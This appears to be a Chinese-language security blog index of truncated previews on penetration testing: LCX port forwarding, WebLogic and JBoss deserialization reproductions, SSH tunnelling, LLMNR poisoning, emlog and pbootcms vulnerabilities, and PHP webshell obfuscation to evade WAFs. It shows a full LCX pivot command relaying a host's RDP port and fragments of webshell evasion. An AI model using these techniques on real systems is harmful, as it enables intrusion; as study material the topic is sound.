内网渗透中转发工具总结 LCX转发 内网机器上执行：lcx.exe –slave 公网IP +端口 内网IP +端口 lcx.exe -slave 192.168.43.142 51 192.168.43.137 3389 将内网(192

WebLogic XMLDecoder反序列化漏洞（CVE-2017-10271） 访问 http://192.168.74.133:7001/ 判断为weblogic，访问http://192.168.74.133:7001/wls-w

weblogic 未授权命令执行漏洞（CVE-2020-14882）复现 影响版本 Oracle Weblogic Server 10.3.6.0.0 Oracle Weblogic Server 12.1.3.0.0 Oracle W

红蓝对抗之Linux内网渗透 隧道 Linux上可以利用自带和第三方工具进行隧道开启，利用隧道，我们可以建立Socks连接、端口转发等操作。 SSH Linux使用SSH常用的开启隧道的命令。 场景1：在控制A机器时，利用socks代

LLMNR Poison内网攻击技术 攻击者在启动 Responder 后，当受害者去访问一个在当前局域网中不存在的主机时就会触发 LLMNR Poison 攻击，如下图所示： 受害者主机 PING 一台局域网中并不存在的主机。Respo

emlog 6.0.0审计 后台删除评论sql注入admin/comment.php 当action为delbyip时，判断token，并且GET传入的ip地址未经过滤带入delcommentbyip方法。跟踪该方法。定义在include

pbootcms漏洞复现 pbootcms1.1.4（1.1.5及以下版本）任意代码执行漏洞 这段函数采用了两次正则匹配的过滤方式，第一次正则需要构造形如{pboot:if(payload)}{/pboot:i

PHP一句话变形 常见的过WAF姿势 拆分与变形 assert=’a’.’s’.’s’.’e’.’r’.’t’ assert=strrev(tressa) assert=$array[0][‘wind’] $item[‘wind’]=’as

CVE-2017-12149 JBoss反序列化漏洞复现 影响范围JBOSSAS 5.x和6.x 环境搭建 下载环境http://download.jboss.org/jbossas/6.1/jboss-as-distribution-6.